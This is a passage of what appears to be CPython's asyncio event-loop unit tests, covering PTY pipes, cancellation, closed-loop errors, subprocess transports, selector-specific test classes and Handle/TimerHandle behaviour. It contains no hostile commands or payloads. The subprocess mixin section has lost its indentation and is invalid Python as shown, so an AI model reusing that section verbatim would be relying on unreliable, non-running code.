@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
    """Read and write transports share one PTY and interleave traffic.

    The slave fd is duplicated so one copy backs a read transport and the
    other a write transport; the master end is driven directly with
    os.read()/os.write().
    """
    master, read_slave = os.openpty()
    write_slave = os.dup(read_slave)
    # Raw mode: no echo/translation, so byte counts match exactly.
    tty.setraw(read_slave)

    slave_read_obj = io.open(read_slave, 'rb', 0)
    read_proto = MyReadPipeProto(loop=self.loop)
    read_connect = self.loop.connect_read_pipe(lambda: read_proto,
                                               slave_read_obj)
    read_transport, p = self.loop.run_until_complete(read_connect)
    self.assertIs(p, read_proto)
    self.assertIs(read_transport, read_proto.transport)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(0, read_proto.nbytes)

    slave_write_obj = io.open(write_slave, 'wb', 0)
    write_proto = MyWritePipeProto(loop=self.loop)
    write_connect = self.loop.connect_write_pipe(lambda: write_proto,
                                                 slave_write_obj)
    write_transport, p = self.loop.run_until_complete(write_connect)
    self.assertIs(p, write_proto)
    self.assertIs(write_transport, write_proto.transport)
    self.assertEqual('CONNECTED', write_proto.state)

    data = bytearray()

    def reader(data):
        # Drain the master into *data*; returns total bytes collected.
        chunk = os.read(master, 1024)
        data += chunk
        return len(data)

    # Slave -> master direction.
    write_transport.write(b'1')
    test_utils.run_until(self.loop, lambda: reader(data) >= 1,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(b'1', data)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual('CONNECTED', write_proto.state)

    # Master -> slave direction.
    os.write(master, b'a')
    test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(1, read_proto.nbytes)
    self.assertEqual('CONNECTED', write_proto.state)

    write_transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(b'12345', data)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual('CONNECTED', write_proto.state)

    os.write(master, b'bcde')
    test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(5, read_proto.nbytes)
    self.assertEqual('CONNECTED', write_proto.state)

    os.close(master)

    read_transport.close()
    self.loop.run_until_complete(read_proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)

    write_transport.close()
    self.loop.run_until_complete(write_proto.done)
    self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
    """Cancelling a pending sock_recv() must complete promptly, not hang."""
    r, w = socket.socketpair()
    r.setblocking(False)
    f = self.loop.create_task(self.loop.sock_recv(r, 1))
    # 'ov' is only present on some task implementations -- presumably the
    # proactor/IOCP overlapped object; checked only when it exists.
    ov = getattr(f, 'ov', None)
    if ov is not None:
        self.assertTrue(ov.pending)

    async def main():
        try:
            self.loop.call_soon(f.cancel)
            await f
        except asyncio.CancelledError:
            res = 'cancelled'
        else:
            res = None
        finally:
            self.loop.stop()
        return res

    start = time.monotonic()
    t = self.loop.create_task(main())
    self.loop.run_forever()
    elapsed = time.monotonic() - start

    # The cancellation must not block on the never-arriving recv data.
    self.assertLess(elapsed, 0.1)
    self.assertEqual(t.result(), 'cancelled')
    self.assertRaises(asyncio.CancelledError, f.result)
    if ov is not None:
        self.assertFalse(ov.pending)
    self.loop._stop_serving(r)

    r.close()
    w.close()
def test_timeout_rounding(self):
    """Tiny sleep timeouts must not cause excessive scheduler iterations."""
    def _run_once():
        # Count each iteration, then delegate to the real _run_once().
        self.loop._run_once_counter += 1
        orig_run_once()

    orig_run_once = self.loop._run_once
    self.loop._run_once_counter = 0
    self.loop._run_once = _run_once

    async def wait():
        loop = self.loop
        await asyncio.sleep(1e-2)
        await asyncio.sleep(1e-4)
        await asyncio.sleep(1e-6)
        await asyncio.sleep(1e-8)
        await asyncio.sleep(1e-10)

    self.loop.run_until_complete(wait())
    # The ideal number of call is 12, but on some platforms, the selector
    # may sleep at little bit less than timeout depending on the resolution
    # of the clock used by the kernel. Tolerate a few useless calls on
    # these platforms.
    self.assertLessEqual(self.loop._run_once_counter, 20,
                         {'clock_resolution': self.loop._clock_resolution,
                          'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
    """remove_reader()/remove_writer() on a closed loop return False."""
    loop = self.create_event_loop()
    noop = lambda: None
    reader_sock, writer_sock = socket.socketpair()
    for sock in (reader_sock, writer_sock):
        self.addCleanup(sock.close)
    loop.add_reader(reader_sock, noop)
    loop.add_writer(writer_sock, noop)
    loop.close()
    self.assertFalse(loop.remove_reader(reader_sock))
    self.assertFalse(loop.remove_writer(writer_sock))
def test_add_fds_after_closing(self):
    """add_reader()/add_writer() on a closed loop raise RuntimeError."""
    loop = self.create_event_loop()
    noop = lambda: None
    reader_sock, writer_sock = socket.socketpair()
    for sock in (reader_sock, writer_sock):
        self.addCleanup(sock.close)
    loop.close()
    with self.assertRaises(RuntimeError):
        loop.add_reader(reader_sock, noop)
    with self.assertRaises(RuntimeError):
        loop.add_writer(writer_sock, noop)
def test_close_running_event_loop(self):
    """Closing the loop from inside a running coroutine must fail."""
    async def shutdown(loop):
        self.loop.close()

    coro = shutdown(self.loop)
    with self.assertRaises(RuntimeError):
        self.loop.run_until_complete(coro)
def test_close(self):
    """Every scheduling API must raise RuntimeError once the loop is closed."""
    self.loop.close()

    async def test():
        pass

    func = lambda: False
    coro = test()
    self.addCleanup(coro.close)

    # operation blocked when the loop is closed
    with self.assertRaises(RuntimeError):
        self.loop.run_forever()
    with self.assertRaises(RuntimeError):
        fut = self.loop.create_future()
        self.loop.run_until_complete(fut)
    with self.assertRaises(RuntimeError):
        self.loop.call_soon(func)
    with self.assertRaises(RuntimeError):
        self.loop.call_soon_threadsafe(func)
    with self.assertRaises(RuntimeError):
        self.loop.call_later(1.0, func)
    with self.assertRaises(RuntimeError):
        self.loop.call_at(self.loop.time() + .0, func)
    with self.assertRaises(RuntimeError):
        self.loop.create_task(coro)
    with self.assertRaises(RuntimeError):
        self.loop.add_signal_handler(signal.SIGTERM, func)

    # run_in_executor test is tricky: the method is a coroutine,
    # but run_until_complete cannot be called on closed loop.
    # Thus iterate once explicitly.
    with self.assertRaises(RuntimeError):
        it = self.loop.run_in_executor(None, func).__await__()
        next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
    def test_subprocess_wait_no_same_group(self):
        """The exit status is still collected when the child runs in its own
        session (start_new_session=True) instead of our process group."""
        # start the new process in a new session
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None,
            start_new_session=True)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        transp.close()
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
# Concrete test classes: run the shared mixin tests against every selector
# implementation available on this platform.
if sys.platform == 'win32':

    class SelectEventLoopTests(EventLoopTestsMixin,
                               test_utils.TestCase):
        """Selector event loop on Windows (no subprocess support there)."""

        def create_event_loop(self):
            return asyncio.SelectorEventLoop()

    class ProactorEventLoopTests(EventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):
        """IOCP-based proactor event loop on Windows."""

        def create_event_loop(self):
            return asyncio.ProactorEventLoop()

        # The proactor loop has no add_reader()/add_writer(): skip the
        # reader/writer callback tests from the mixin.
        def test_reader_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_reader_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_writer_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_writer_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_remove_fds_after_closing(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
    import selectors

    class UnixEventLoopTestsMixin(EventLoopTestsMixin):
        """Installs a child watcher so the subprocess tests work on Unix."""

        def setUp(self):
            super().setUp()
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

        def tearDown(self):
            asyncio.set_child_watcher(None)
            super().tearDown()

    if hasattr(selectors, 'KqueueSelector'):
        class KqueueEventLoopTests(UnixEventLoopTestsMixin,
                                   SubprocessTestsMixin,
                                   test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(
                    selectors.KqueueSelector())

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            # Issue #20667: KqueueEventLoopTests.test_read_pty_output()
            # hangs on OpenBSD 5.5
            @unittest.skipIf(sys.platform.startswith('openbsd'),
                             'test hangs on OpenBSD')
            def test_read_pty_output(self):
                super().test_read_pty_output()

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            def test_write_pty(self):
                super().test_write_pty()

    if hasattr(selectors, 'EpollSelector'):
        class EPollEventLoopTests(UnixEventLoopTestsMixin,
                                  SubprocessTestsMixin,
                                  test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.EpollSelector())

    if hasattr(selectors, 'PollSelector'):
        class PollEventLoopTests(UnixEventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.PollSelector())

    # Should always exist.
    class SelectEventLoopTests(UnixEventLoopTestsMixin,
                               SubprocessTestsMixin,
                               test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
    """Do nothing; accept and ignore any arguments (returns None)."""
    return None
class HandleTests(test_utils.TestCase):
    """Unit tests for asyncio.Handle (callback wrapper): cancellation,
    exception routing, weakref support and repr() formatting."""

    def setUp(self):
        super().setUp()
        self.loop = mock.Mock()
        self.loop.get_debug.return_value = True

    def test_handle(self):
        """A Handle stores its callback/args and supports cancellation."""
        def callback(*args):
            return args

        args = ()
        h = asyncio.Handle(callback, args, self.loop)
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())

        h.cancel()
        self.assertTrue(h.cancelled())

    def test_callback_with_exception(self):
        """Exceptions raised by the callback go to the loop's exception handler."""
        def callback():
            raise ValueError()

        self.loop = mock.Mock()
        self.loop.call_exception_handler = mock.Mock()

        h = asyncio.Handle(callback, (), self.loop)
        h._run()

        self.loop.call_exception_handler.assert_called_with({
            'message': test_utils.MockPattern('Exception in callback.*'),
            'exception': mock.ANY,
            'handle': h,
            'source_traceback': h._source_traceback,
        })

    def test_handle_weakref(self):
        wd = weakref.WeakValueDictionary()
        h = asyncio.Handle(lambda: None, (), self.loop)
        wd['h'] = h  # Would fail without __weakref__ slot.

    def test_handle_repr(self):
        """repr() shows the callback (unwrapping partials) and its source."""
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s>'
                         % (filename, lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<Handle cancelled>')

        # decorated function
        cb = types.coroutine(noop)
        h = asyncio.Handle(cb, (), self.loop)
        self.assertEqual(repr(h),
                         '<Handle noop() at %s:%s>'
                         % (filename, lineno))

        # partial function
        cb = functools.partial(noop, 1, 2)
        h = asyncio.Handle(cb, (3,), self.loop)
        regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial function with keyword args
        cb = functools.partial(noop, x=1)
        h = asyncio.Handle(cb, (2, 3), self.loop)
        regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial method
        method = HandleTests.test_handle_repr
        cb = functools.partialmethod(method)
        filename, lineno = test_utils.get_function_source(method)
        h = asyncio.Handle(cb, (), self.loop)

        cb_regex = r'<function HandleTests.test_handle_repr .*>'
        cb_regex = fr'functools.partialmethod\({cb_regex}, , \)\(\)'
        regex = fr'^<Handle {cb_regex} at {re.escape(filename)}:{lineno}>$'
        self.assertRegex(repr(h), regex)

    def test_handle_repr_debug(self):
        """In debug mode repr() also records where the handle was created."""
        self.loop.get_debug.return_value = True

        # simple function
        # NOTE: create_lineno must be computed on the line directly before
        # the Handle() call; do not insert anything between these two lines.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

        # double cancellation won't overwrite _repr
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

    def test_handle_source_traceback(self):
        """In debug mode each handle records the traceback of its creation."""
        loop = asyncio.get_event_loop_policy().new_event_loop()
        loop.set_debug(True)
        self.set_event_loop(loop)

        def check_source_traceback(h):
            # Relies on being called on the line directly after the call
            # that created the handle; keep those call pairs adjacent.
            lineno = sys._getframe(1).f_lineno - 1
            self.assertIsInstance(h._source_traceback, list)
            self.assertEqual(h._source_traceback[-1][:3],
                             (__file__,
                              lineno,
                              'test_handle_source_traceback'))

        # call_soon
        h = loop.call_soon(noop)
        check_source_traceback(h)
        # call_soon_threadsafe
        h = loop.call_soon_threadsafe(noop)
        check_source_traceback(h)
        # call_later
        h = loop.call_later(0, noop)
        check_source_traceback(h)
        # call_at
        h = loop.call_later(0, noop)
        check_source_traceback(h)

    @unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
                         'No collections.abc.Coroutine')
    def test_coroutine_like_object_debug_formatting(self):
        # Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_core or gi_code attributes
        # (such as ones compiled with Cython).

        coro = CoroLike()
        coro.__name__ = 'AAA'
        self.assertTrue(asyncio.iscoroutine(coro))
        self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')

        coro.__qualname__ = 'BBB'
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')

        coro.cr_running = True
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')

        coro.__name__ = coro.__qualname__ = None
        self.assertEqual(coroutines._format_coroutine(coro),
                         '<CoroLike without __name__>() running')

        coro = CoroLike()
        coro.__qualname__ = 'CoroLike'
        # Some coroutines might not have '__name__', such as
        # built-in async_gen.asend().
        self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')

        coro = CoroLike()
        coro.__qualname__ = 'AAA'
        coro.cr_code = None
        self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
    """Unit tests for asyncio.TimerHandle: hashing, scheduling time,
    cancellation, repr() and rich-comparison ordering."""

    def setUp(self):
        super().setUp()
        self.loop = mock.Mock()

    def test_hash(self):
        # A timer hashes by its scheduled time.
        when = time.monotonic()
        h = asyncio.TimerHandle(when, lambda: False, (),
                                mock.Mock())
        self.assertEqual(hash(h), hash(when))

    def test_when(self):
        when = time.monotonic()
        h = asyncio.TimerHandle(when, lambda: False, (),
                                mock.Mock())
        self.assertEqual(when, h.when())

    def test_timer(self):
        """Cancelling a timer clears its callback and args."""
        def callback(*args):
            return args

        args = (1, 2, 3)
        when = time.monotonic()
        h = asyncio.TimerHandle(when, callback, args, mock.Mock())
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())

        # cancel
        h.cancel()
        self.assertTrue(h.cancelled())
        self.assertIsNone(h._callback)
        self.assertIsNone(h._args)

    def test_timer_repr(self):
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        src = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() at %s:%s>' % src)

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123>')

    def test_timer_repr_debug(self):
        self.loop.get_debug.return_value = True

        # simple function
        # NOTE: create_lineno must be computed on the line directly before
        # the TimerHandle() call; do not insert anything between them.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

    def test_timer_comparison(self):
        """Timers order by scheduled time; equality also requires the same
        cancellation state; comparison with non-timers is rejected."""
        def callback(*args):
            return args

        when = time.monotonic()

        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when, callback, (), self.loop)
        # TODO: Use assertLess etc.
        self.assertFalse(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertTrue(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertFalse(h2 > h1)
        self.assertTrue(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertTrue(h1 == h2)
        self.assertFalse(h1 != h2)

        h2.cancel()
        self.assertFalse(h1 == h2)

        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
        self.assertTrue(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertFalse(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertTrue(h2 > h1)
        self.assertFalse(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertFalse(h1 == h2)
        self.assertTrue(h1 != h2)

        # comparison with a plain (non-timer) Handle is NotImplemented
        h3 = asyncio.Handle(callback, (), self.loop)
        self.assertIs(NotImplemented, h1.__eq__(h3))
        self.assertIs(NotImplemented, h1.__ne__(h3))

        with self.assertRaises(TypeError):
            h1 < ()
        with self.assertRaises(TypeError):
            h1 > ()
        with self.assertRaises(TypeError):
            h1 <= ()
        with self.assertRaises(TypeError):
            h1 >= ()
        self.assertFalse(h1 == ())
        self.assertTrue(h1 != ())

        self.assertTrue(h1 == ALWAYS_EQ)
        self.assertFalse(h1 != ALWAYS_EQ)
        self.assertTrue(h1 < LARGEST)
        self.assertFalse(h1 > LARGEST)
        self.assertTrue(h1 <= LARGEST)
        self.assertFalse(h1 >= LARGEST)
        self.assertFalse(h1 < SMALLEST)
        self.assertTrue(h1 > SMALLEST)
        self.assertFalse(h1 <= SMALLEST)
        self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
    """AbstractEventLoop is a pure interface: every method must raise
    NotImplementedError until a concrete loop overrides it."""

    def test_not_implemented(self):
        f = mock.Mock()
        loop = asyncio.AbstractEventLoop()
        # (method, *args) pairs, checked in the same order as before.
        calls = [
            (loop.run_forever,),
            (loop.run_until_complete, None),
            (loop.stop,),
            (loop.is_running,),
            (loop.is_closed,),
            (loop.close,),
            (loop.create_task, None),
            (loop.call_later, None, None),
            (loop.call_at, f, f),
            (loop.call_soon, None),
            (loop.time,),
            (loop.call_soon_threadsafe, None),
            (loop.set_default_executor, f),
            (loop.add_reader, 1, f),
            (loop.remove_reader, 1),
            (loop.add_writer, 1, f),
            (loop.remove_writer, 1),
            (loop.add_signal_handler, 1, f),
            (loop.remove_signal_handler, 1),
            (loop.remove_signal_handler, 1),
            (loop.set_exception_handler, f),
            (loop.default_exception_handler, f),
            (loop.call_exception_handler, f),
            (loop.get_debug,),
            (loop.set_debug, f),
        ]
        for method, *args in calls:
            self.assertRaises(NotImplementedError, method, *args)

    def test_not_implemented_async(self):

        async def inner():
            f = mock.Mock()
            loop = asyncio.AbstractEventLoop()
            # Lambdas defer the call so each awaitable is created (and its
            # NotImplementedError raised) inside its own assertRaises block.
            awaitable_factories = [
                lambda: loop.run_in_executor(f, f),
                lambda: loop.getaddrinfo('localhost', 8080),
                lambda: loop.getnameinfo(('localhost', 8080)),
                lambda: loop.create_connection(f),
                lambda: loop.create_server(f),
                lambda: loop.create_datagram_endpoint(f),
                lambda: loop.sock_recv(f, 10),
                lambda: loop.sock_recv_into(f, 10),
                lambda: loop.sock_sendall(f, 10),
                lambda: loop.sock_connect(f, f),
                lambda: loop.sock_accept(f),
                lambda: loop.sock_sendfile(f, f),
                lambda: loop.sendfile(f, f),
                lambda: loop.connect_read_pipe(f, mock.sentinel.pipe),
                lambda: loop.connect_write_pipe(f, mock.sentinel.pipe),
                lambda: loop.subprocess_shell(f, mock.sentinel),
                lambda: loop.subprocess_exec(f),
            ]
            for factory in awaitable_factories:
                with self.assertRaises(NotImplementedError):
